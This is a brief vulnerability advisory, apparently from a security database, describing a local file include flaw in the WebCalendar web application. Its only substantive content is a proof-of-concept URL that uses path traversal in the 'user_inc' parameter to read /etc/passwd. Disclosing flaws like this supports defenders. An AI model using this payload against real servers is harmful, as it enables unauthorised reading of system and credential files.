WebCalendar Local File Include Information Disclosure Vulnerability

info
discussion
exploit
solution
references

WebCalendar Local File Include Information Disclosure Vulnerability

The following proof-of-concept has been made available by noconflic:

http://www.example.com/webcalendar/[filename].php?user_inc=../../../../../etc/passwd